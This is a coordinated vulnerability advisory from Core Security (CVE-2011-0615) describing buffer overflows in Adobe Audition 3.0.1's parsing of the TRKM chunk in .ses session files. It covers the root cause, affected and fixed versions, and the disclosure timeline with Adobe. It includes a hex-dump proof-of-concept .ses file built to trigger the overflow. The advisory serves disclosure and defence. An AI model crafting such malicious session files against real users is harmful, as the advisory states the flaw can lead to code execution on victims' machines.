Core Security Technologies Advisory 2011.0204

2011-05-12T00:00:00
ID PACKETSTORM:101374
Type packetstorm
Reporter Core Security Technologies
Modified 2011-05-12T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Core Security Technologies - Corelabs Advisory  
http://corelabs.coresecurity.com/  
  
Adobe Audition vulnerability processing malformed session file  
  
  
  
1. *Advisory Information*  
  
Title: Adobe Audition vulnerability processing malformed session file  
Advisory ID: CORE-2011-0204  
Advisory URL:  
http://www.coresecurity.com/content/Adobe-Audition-malformed-SES-file  
Date published: 2011-05-12  
Date of last update: 2011-05-12  
Vendors contacted: Adobe  
Release mode: Coordinated release  
  
  
  
2. *Vulnerability Information*  
  
Class: Buffer Overflow [CWE-119]  
Impact: Code execution  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE Name: CVE-2011-0615  
  
  
  
3. *Vulnerability Description*  
  
Adobe Audition is a digital audio workstation software for Windows that  
was originally developed by Syntrillium as Cool Edit Pro, and acquired  
by Adobe in 2003. The software allows user to do multitrack audio mixing  
and editing and supports storing of multitrack audio using a session  
file format (.ses).  
  
Adobe audition is vulnerable to numerous buffer overflows while parsing  
several fields inside the TRKM chunk on session (.ses) files. Then, a  
memory corruption can be leveraged to execute arbitrary code on  
vulnerable systems by enticing users to open specially crafted session  
files.  
  
This vulnerability could be used by a remote attacker to execute  
arbitrary code with the privileges of the user that opened the malicious  
file.  
  
  
4. *Vulnerable packages*  
  
. Adobe Audition 3.0.1.  
. Older versions are probably affected too, but they were not checked.  
  
  
5. *Non-vulnerable packages*  
  
. Adobe Audition CS5.5.  
  
  
6. *Vendor Information, Solutions and Workarounds*  
  
Adobe strongly recommends Audition users discontinue use of the Adobe  
Session (.ses) file format and switch to use of the XML session format.  
With the release of Audition CS5.5, the binary Audition Session (.ses)  
file format is no longer supported.  
  
  
7. *Credits*  
  
These vulnerabilities were discovered by Diego Juarez, Eduardo Koch and  
Laura Balian from Core Security Technologies. Additional research,  
exploitability analysis and PoC were made by Diego Juarez from Core  
Exploit Writers Team.  
  
  
8. *Technical Description / Proof of Concept Code*  
  
Adobe audition is vulnerable to numerous buffer overflows while parsing  
several fields inside the 'TRKM' chunk on session (.ses) files.  
  
The vulnerability comes from passing a wrongly assumed max buffer size  
to the function found at address 0x483F065A. This function has a  
prototype similar to this:  
  
/-----  
unsigned int 483F065A(wchar_t *dest, unsigned int size, wchar_t *src);  
- -----/  
The 'size' parameter is assumed to be in WCHARs but (while parsing  
session files) the code uses it as a size expressed in bytes, leading to  
multiple buffer overflows in several fields in the 'TRKM' chunk of the  
session file.  
  
  
8.1. *Proof of Concept*  
  
The following (dumped) .ses file should trigger the vulnerability.  
  
/-----  
  
00000000: 43 4F 4F 4C-4E 45 53 53-D5 01 00 00-54 52 4B 4D COOLNESS+? TRKM  
00000010: 48 A3 00 00-01 00 00 00-07 00 00 00-02 00 00 00 Hú ? ? ?  
00000020: 0B 00 00 00-41 00 75 00-64 00 69 00-6F 00 54 00 ? A u d i o T  
00000030: 72 00 61 00-63 00 6B 00-00 00 1E A3-00 00 10 27 r a c k ?ú ?'  
00000040: 00 00 07 00-00 00 4D 00-61 00 73 00-74 00 65 00 ? M a s t e  
00000050: 72 00 00 00-00 00 00 00-00 00 00 00-00 00 30 00 r 0  
00000060: 01 00 00 00-00 00 01 00-00 00 00 00-01 00 00 00 ? ? ?  
00000070: 20 4E 00 00-01 00 00 00-20 00 00 00-40 1F 00 00 N ? @?  
00000080: 02 00 00 00-1B 00 00 00-41 00 75 00-64 00 69 00 ? ? A u d i  
00000090: 74 00 69 00-6F 00 6E 00-20 00 33 00-2E 00 30 00 t i o n 3 . 0  
000000A0: 20 00 57 00-69 00 6E 00-64 00 6F 00-77 00 73 00 W i n d o w s  
000000B0: 20 00 53 00-6F 00 75 00-6E 00 64 00-00 00 05 00 S o u n d ?  
000000C0: 00 00 0C 00-00 00 41 00-75 00 64 00-69 00 6F 00 ? A u d i o  
000000D0: 20 00 49 00-6E 00 70 00-75 00 74 00-00 00 1B 00 I n p u t ?  
000000E0: 00 00 41 00-75 00 64 00-69 00 74 00-69 00 6F 00 A u d i t i o  
000000F0: 6E 00 20 00-33 00 2E 00-30 00 20 00-57 00 69 00 n 3 . 0 W i  
00000100: 6E 00 64 00-6F 00 77 00-73 00 20 00-53 00 6F 00 n d o w s S o  
00000110: 75 00 6E 00-64 00 00 00-FF FF FF FF-0D 00 00 00 u n d ?  
00000120: 41 00 75 00-64 00 69 00-6F 00 20 00-4F 00 75 00 A u d i o O u  
00000130: 74 00 70 00-75 00 74 00-00 00 00 00-00 00 01 00 t p u t ?  
00000140: 00 00 00 00-00 00 00 00-00 00 00 00-00 00 40 00 @  
00000150: 00 00 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAA  
00000160: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000170: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000180: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
00000190: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001A0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001B0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001C0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001D0: 41 41 41 41-41 41 41 41-41 41 41 41-41 41 41 41 AAAAAAAAAAAAAAAA  
000001E0: 41 - - - A  
  
- -----/  
  
  
  
9. *Report Timeline*  
  
. 2011-02-03:  
Core Advisories Team notifies Adobe PSIRT several crashes in Adobe  
Audition and asks for technical assistance in order to determine if  
these crashes can result into a security vulnerability.  
  
. 2011-02-03:  
Vendor acknowledges reception of the last email and notifies that the  
Adobe tracking number 850 was opened to track this issue.  
  
. 2011-02-24:  
Core notifies that there has been no communication in the last 3 weeks  
and asks for a status update about the reported crashes.  
  
. 2011-02-28:  
Adobe PSIRT notifies that the file format affected by the issue will no  
longer be supported with the next release of Audition, planned for May  
2011. Vendor also notifies their plan to publish a Security Bulletin,  
including an acknowledgement for this report.  
  
. 2011-03-09:  
Core notifies that the impact of these bugs is not clear and requests  
technical information to understand the nature and root cause of the  
reported crashes rather than purely information about Adobe release  
decisions. Core also requires Adobe to clarify if this bug is considered  
exploitable and asks if patches or fixes are going to be released as well.  
  
. 2011-03-16:  
Core asks for a status update.  
  
. 2011-03-16:  
PSIRT notifies that they have not done any analysis to determine if this  
issue is exploitable because:  
  
1. The .ses file format is an older format that will not be supported  
with the next release.  
2. The .ses files store information about a recording session; they  
are not typically exchanged between parties over email, and are even  
less likely to be accepted and opened from non-trusted sources.  
3. Adobe has been encouraging people to use XML files in place of the  
binary .ses file format for the last year [1].  
4. The installed base for Audition is small compared with  
higher-profile Adobe products.  
  
For the above mentioned reasons, vendor considers that it is not a high  
priority to perform a vulnerability analysis. Vendor also notifies that  
they are currently planning to publish a Security Bulletin in May 2011  
with the release of the next major version of Audition.  
  
. 2011-04-04:  
Core notifies that additional research was done by Diego Juarez and the  
reported flaws seem to be exploitable. Core notifies the advisory will  
be released when these Adobe patches become available.  
  
. 2011-04-04:  
Vendor notifies that the Adobe ID 897 was opened to track this case and  
they are on track for releasing patches in May.  
  
. 2011-04-28:  
Core notifies that the advisory publication was rescheduled to May 10th  
and requests confirmation for a coordinated release. Core also requests  
further information regarding the affected and patched versions numbers.  
  
. 2011-05-05:  
Vendor notifies that these issues should be resolved in the upcoming  
release of Adobe Audition planned for May 10th.  
  
. 2011-05-06:  
Vendor notifies that due to a last minute change, the release was  
tentatively rescheduled for May 12th.  
  
. 2011-05-06:  
Core reschedules advisory publication for May 12th.  
  
. 2011-05-12:  
Advisory CORE-2011-0204 is published.  
  
  
  
10. *References*  
  
[1]  
http://blogs.adobe.com/insidesound/2010/03/audition_xml_session_format.html.  
  
  
  
11. *About CoreLabs*  
  
CoreLabs, the research center of Core Security Technologies, is charged  
with anticipating the future needs and requirements for information  
security technologies. We conduct our research in several important  
areas of computer security including system vulnerabilities, cyber  
attack planning and simulation, source code auditing, and cryptography.  
Our results include problem formalization, identification of  
vulnerabilities, novel solutions and prototypes for new technologies.  
CoreLabs regularly publishes security advisories, technical papers,  
project information and shared software tools for public use at:  
http://corelabs.coresecurity.com.  
  
  
12. *About Core Security Technologies*  
  
Core Security Technologies enables organizations to get ahead of threats  
with security test and measurement solutions that continuously identify  
and prove real-world exposures to their most critical assets. Our  
customers can gain real visibility into their security standing, real  
validation of their security controls, and real metrics to more  
effectively secure their organizations.  
  
Core Security's software solutions build on over a decade of trusted  
research and leading-edge threat expertise from the company's Security  
Consulting Services, CoreLabs and Engineering groups. Core Security  
Technologies can be reached at +1 (617) 399-6980 or on the Web at:  
http://www.coresecurity.com.  
  
  
13. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2011 Core Security  
Technologies and (c) 2011 CoreLabs, and are licensed under a Creative  
Commons Attribution Non-Commercial Share-Alike 3.0 (United States)  
License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/  
  
  
14. *PGP/GPG Keys*  
  
This advisory has been signed with the GPG key of Core Security  
Technologies advisories team, which is available for download at  
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.9 (MingW32)  
  
iEYEARECAAYFAk3MJSwACgkQyNibggitWa0eXQCdHKHspwXyJu8ZwHyf2sFlOrfg  
6YwAn0Pf2/bZJ80H2C2IfO0fG9BpvP4d  
=EybH  
-----END PGP SIGNATURE-----  
`